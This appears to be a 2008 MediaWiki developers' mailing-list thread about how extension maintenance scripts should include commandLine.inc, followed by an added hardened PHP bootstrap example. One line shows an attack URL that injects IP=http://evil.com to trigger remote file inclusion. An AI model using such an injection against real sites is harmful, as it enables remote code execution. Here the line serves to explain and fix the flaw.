"Tim Starling" <tstarling(a)wikimedia.org> wrote in
message news:fung8v$bon$1@ger.gmane.org...
Andrew Garrett wrote:
> On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements <gmane(a)kennel17.co.uk> wrote:
>> From an extension writer's point of view, the current situation is to put in
>> a relative require_once() line to commandLine.inc and hope that the file is
>> in the expected place.
global $IP;
require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution
vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://evil.com
$IP is not defined at the point that the script is run. $IP is defined by
including commandLine.inc, so you're getting into a bit of a circular
scenario there... :-)
> A better way to do it is:
> require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
> If that path doesn't exist, the sysadmin can create it. Scripts that rely
> on the working directory being $IP or whatever are really annoying.
That is the current method, which causes problems as detailed in my previous
post. To expand on your point, scripts that rely on the extension being in
the extensions folder are also annoying.
We provide MediaWiki to our clients via a symlink in their web folder. They
have an 'extensions' folder in their home directory where they can add their
own extensions (the MW extensions folder is also used for the MW extensions
we have enabled globally and which we offer support for). Currently there
is no easy way for them to run the maintenance scripts for the extensions
they have locally installed without hacking the code to fix the paths.
- Mark Clements (HappyDog)
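
A hardened bootstrap for an extension maintenance script, as an added example that is not part of the original thread or MediaWiki's own code. It addresses both points raised above: the include path never comes from a request-controllable global, and the extension may live outside the MediaWiki tree. The `MW_INSTALL_PATH` environment variable name, the `resolveInstallPath()` helper and the `$installPath` variable are assumptions made for illustration.

```php
<?php
// Added example: bootstrap for an extension maintenance script.
// Assumptions: MW_INSTALL_PATH (environment variable name) and
// resolveInstallPath() (hypothetical helper) are illustrative only.

// Maintenance scripts are command-line tools. Refusing every web SAPI means
// no query-string value can reach the include below, even if the script sits
// inside the web root with register_globals enabled.
if ( PHP_SAPI !== 'cli' ) {
    exit( 1 );
}

/**
 * Locate the MediaWiki install directory without trusting global variables.
 *
 * @param string $scriptDir Directory of the calling script
 * @return string|false Canonical install path, or false if not found
 */
function resolveInstallPath( $scriptDir ) {
    // 1. Explicit setting from the process environment, for extensions that
    //    are installed outside the MediaWiki tree (symlinked installs).
    $candidate = getenv( 'MW_INSTALL_PATH' );

    // 2. Fallback: the conventional extensions/<Name>/ layout, anchored to
    //    this file's location rather than the working directory.
    if ( $candidate === false || $candidate === '' ) {
        $candidate = $scriptDir . '/../..';
    }

    // realpath() resolves only local filesystem paths, so a URL-style value
    // fails here instead of being handed to require_once().
    $real = realpath( $candidate );
    if ( $real === false || !is_file( "$real/maintenance/commandLine.inc" ) ) {
        return false;
    }
    return $real;
}

// A local variable name is used so nothing depends on $IP being set (or
// being injectable) before commandLine.inc defines it.
$installPath = resolveInstallPath( dirname( __FILE__ ) );
if ( $installPath === false ) {
    fwrite( STDERR, "Cannot find maintenance/commandLine.inc; " .
        "set MW_INSTALL_PATH to the MediaWiki directory.\n" );
    exit( 1 );
}

require_once( "$installPath/maintenance/commandLine.inc" );
```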